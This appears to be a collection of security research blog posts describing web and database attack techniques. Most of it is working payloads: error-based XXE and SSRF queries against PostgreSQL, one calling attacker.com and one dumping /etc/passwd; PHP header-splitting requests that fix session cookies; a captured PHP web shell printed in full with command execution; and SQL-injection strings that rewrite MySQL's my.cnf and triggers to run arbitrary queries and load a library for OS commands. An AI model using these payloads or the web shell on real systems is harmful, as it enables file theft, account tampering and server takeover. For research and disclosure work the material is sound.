Advanced mobile UI redressing attacks using gyroscope/accelerometer

When you hold a mobile phone in hand and put your finger on the screen area where you want to tap, you move phone a little.

These deviations can be measured with a built-in gyroscope and accelerometer and use for UI-redressing attack.

You probably won't react timely to take off your finger while pressing the screen even if you see some other graphic object (such as window or button) on the area where you are going to press.

Funny video:

Advanced mobile UI redressing attack by d0znpp on GoAnimate

Animated Presentations - Powered by GoAnimate.

Error-based XXE exploitation trick

Exploiting of XXE vulnerabilities are difficult when you cannot view results XML document.

Recent vulnerability in Postgres XXE are good example of this: entities resolved but not added to XML output. This is common case in the wild.

Bring to your attention easy trick which provide reading first and last lines of ASCII files (which cannot be read by classic XXE attack vector, such as error-based case):

<!DOCTYPE [
   <!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes also /dev/null -->
   <!ENTITY wanttoread SYSTEM "/etc/hostname" >
]>
<!-- read first line of file using error-based XXE -->
<root>
&malformed; &wanttoread;
</root>

<!DOCTYPE [
   <!ENTITY malformed SYSTEM "/dev/urandom" ><!-- sometimes /dev/null -->
   <!ENTITY wanttoread SYSTEM "/etc/hostname" >
]>
<!-- read last line of file using error-based XXE -->
<root>
 &wanttoread; &malformed;
</root>

In error message you will look at smth like this:

ERROR: hostnamestr
                                     ^
didn't parse (line: 1 pos: 13)

PHP multiple headers bypass available again

Recenlty we wrote about universal PHP bypass for header() function.
That trick is based on %0d byte instead of %0d%0a to split HTTP response.
Bug was fixed as you can see at changelog:
http://php.net/ChangeLog-5.php

Version 5.3.11  

Fixed bug #60227 (header() cannot detect the multi-line header with CR). 

 https://bugs.php.net/bug.php?id=60227 is original bug
And what about fix?

                for (i = 0; i < header_line_len; i++) {
                        /* RFC 2616 allows new lines if followed by SP or HT */
                        int illegal_break =
                                        (header_line[i+1] != ' ' && header_line[i+1] != '\t')                                        && (
                                                header_line[i] == '\n'
                                                || (header_line[i] == '\r' && header_line[i+1] != '\n'));

Pay your attention to red line.

And as we wrote before, bug still available for Internet Explorer.

Source code:

<?php
header("Location: /?asd".$_GET['r']);
?>

Attack vectors:
GET /?r=split%0d+Set-cookie:PHPSESSID=predicated HTTP/1.1

GET /?r=split%0d%20Set-cookie:PHPSESSID=predicated HTTP/1.1

GET /?r=split%0d%09Set-cookie:PHPSESSID=predicated HTTP/1.1

GET /?r=split%0d%0a+Set-cookie:PHPSESSID=predicated HTTP/1.1

GET /?r=split%0d%0a%20Set-cookie:PHPSESSID=predicated HTTP/1.1

GET /?r=split%0d%0a%09Set-cookie:PHPSESSID=predicated HTTP/1.1

PostgreSQL (all) error-based XXE 0day

Recently we found and published at PHDays PostgreSQL 0day error-based XXE vulnerability.
Currently it may be used by attacker to read parts of local files and make requests from DB server to intranet (SSRF - Server Side Request Forgery).

Example:
DoS:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')

SSRF:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')

Error-based XXE:

select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');

ERROR:  invalid XML document
DETAILS:  /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name
exec 9<&0 </etc/fstab       ^
/etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name
exec 9<&0 </etc/fstab        ^
/etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced
exec 9<&0 </etc/fstab          ^
Entity: line 1: parser error : Failure to process entity abc
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
                                                                               ^
Entity: line 1: parser error : Entity 'abc' not defined
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;                                                                               ^

UPDATE!
Classical XXE from XSLT transformation found.
Reading any data are possible also:


SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*">  <xsl:element name="samples">    <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element>  </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);

                                     xslt_process                                    
-----------------------------------------------------------------------------------------
 <?xml version="1.0"?>
 <samples><sample>root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false
 sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
 puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
 Debian-exim:x:111:115::/var/spool/exim4:/bin/false
 alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash
 oxod:x:1001:1001:,,,:/home/oxod:/bin/bash
 mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false
 postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
 oracle:x:1002:1002::/u01/app/oracle:/bin/bash
 </sample></samples>

(1 row)

PHP all getimage() bypass

Many PHP projects have image validation, based on getimagesize() function:
http://php.net/manual/ru/function.getimagesize.php

That function has an error, provides attacker to read Berkley DB format and another files, started at 0x00 (null-byte).

<?php
if(getimagesize("/etc/aliases.db")){
   echo "OK";
}
?>
#php -f gis-test.php
OK

In *BSD systems and MacOS Berkley DB files used as configs.
It may be used by attacker to bypass image reading functions based on getimagesize().

We used that trick on PHD pre-hackquest's (Blow Up the Town) task called Tretyakovskaya.
It was sucessfull find by participants listed below:
rdot.org
shr
AVictor
Antichat
MERRON
letm
sc2tv
DarkByte
ei-grad
vos
korvin
grixa
n0ne
Endragor
tiger
Greetz, guys!

Find new web bot [Jembot]

We have discovered a new kind of bot that spreads in the form of web shells, called Jembot.
Source code:

<?php
if(isset($_GET['jembot']))
{
echo "<body bgcolor=black>
<font color=cyan size=3>";
echo "<h2>empixcrew technology</h2><hr>";
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
<label for=\"file\">empix:</label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\" name=\"submit\" value=\"uplod\">
</form>";
if ($_FILES["file"]["error"] > 0)
  {
  echo "gagal: " . $_FILES["file"]["error"] . "<br />";
  }
else
  {
  echo "sukses: " . $_FILES["file"]["name"] . "<br />";
  echo "ukuran: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
  echo "mentah: " . $_FILES["file"]["tmp_name"];
  }
if (file_exists("" . $_FILES["file"]["name"]))
      {
      echo $_FILES["file"]["name"] . " wes enek cok. ";
      }
    else
      {
      move_uploaded_file($_FILES["file"]["tmp_name"],
      "" . $_FILES["file"]["name"]);
      echo " mateng: " . "" . $_FILES["file"]["name"];
echo"<hr>";
      }
  }
elseif ($_GET["empix"]){
system($_GET["empix"]);
}
else {
$un = php_uname();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
echo "empixcrew: $un $php1 :empixcrew";
}
?>
</style><embed src="http://empixcrew.net/gaza.swf" autostart="true" hidden="true"><SCRIPT> 

Location of bot source: http://picasa.com.ipsupply.com.au/wp-content/uploads/2011/12/chase/hell
.php

Attacks coming from IP 187.17.65.242 Brasil

WHOIS:

inetnum: 187.17.64/18 aut-num: AS15201 abuse-c: SEO50 owner: Universo Online S.A. ownerid: 001.109.184/0001-95 responsible: Contato da Entidade UOL country: BR owner-c: CAU12 tech-c: CAU12 inetrev: 187.17.64/20 nserver: ns1.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 nserver: ns2.host.uol.com.br nsstat: 20120412 AA nslastaa: 20120412 created: 20081022 changed: 20081022 
nic-hdl-br: CAU12 person: Contato Administrativo - UOL e-mail: l-registrobr-uol@corp.uol.com.br created: 20031202 changed: 20100106 
nic-hdl-br: SEO50 person: Security Office e-mail: security@uol.com.br created: 20021114 changed: 20110830 

We strongly recommend to block this ip address and run the following command to detect attacks:
#egrep -n --color "hell.php" *.log

Advanced SQLi exploitation with FILE_PRIV

We would like to open our blog notes on the practical implementation of the SQL-injections. 

And also we try to focus more attention on the practical aspects of web application security in the future.

SQL injections are the most common server-side Web application vulnerabilities and meet almost every audit in our practice.

Very often it happens that through these vulnerabilities we can write files (granted FILE_PRIV).

The simplest way of the exploitation in this case - write executable script (i.e. shell.php) in www-root (i.e. /var/www/).
But sometimes there is no filesystem rights to write in /var/www.


We would like to present a method for the operation of these vulnerabilities to execute arbitrary queries and even commands (tested in Debian lenny).
This is not the easiest attack vector, but it is possible!

The idea is very simple and is to replace the file my.cnf. This configuration file is write-protected directory:

-rw-r--r-- 1 root root 3596 /etc/mysql/my.cnf

#debian lenny

However, if you write my.cnf in DATADIR it will work! And DATADIR is writable always:

drwx------  4 mysql   mysql   4096 /var/lib/mysql

#debian lenny

Then look at documentation:

http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_init_connect

http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_init_file

http://dev.mysql.com/doc/refman/5.1/en/replication-options-slave.html#sysvar_init_slave

Finally, attack vector will be like that:

'AND 1=2 UNION SELECT '[mysqld]\ninit-connect="update users set passwd=123 where id=0"\n#' 
INTO OUTFILE '/var/lib/mysql/my.cnf'-- -

Now you can execute any query from SQL-injection into SELECT statement and FILE_PRIV.

Query in init-connect will be executed after the non-SUPER user logs in. 

And there is another problem - you must somehow restart MySQL daemon.

The easiest way to wait until it happens naturally.

But you can always send a hard query to exceed a memory limit. 

Then OOM Killer make your job ;)

On MySQL 5.1.2+ (required by http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_plugin_dir) you can also execute OS commands by my.cnf like that:

[mysqld]

plugin_dir = /var/tmp/aaa # 5.1.2+ only

init-connect = "CREATE FUNCTION do_system RETURNS INTEGER SONAME 'so_system.so.0.0';"

# 2 3 4 5 6 7 8 9 10 11

Where /var/tmp/aaa is any writable directory, so_system.so.0.0 is your binary library.

UPDATE: see also genius work from: http://www.wisec.it/sectou.php?p=1

AND 1=0 union select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/users/user.TRG' LINES TERMINATED BY '\\ntriggers=\'CREATEDEFINER=`root`@`localhost` trigger atk after insert on user for each row\\nbegin\\nupdate user set isadmin=0 whereisadmin=1;\\nend\'sql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';

Thank you for your attention.
//Alexander Golovko, Vladimir d0znpp Vorontsov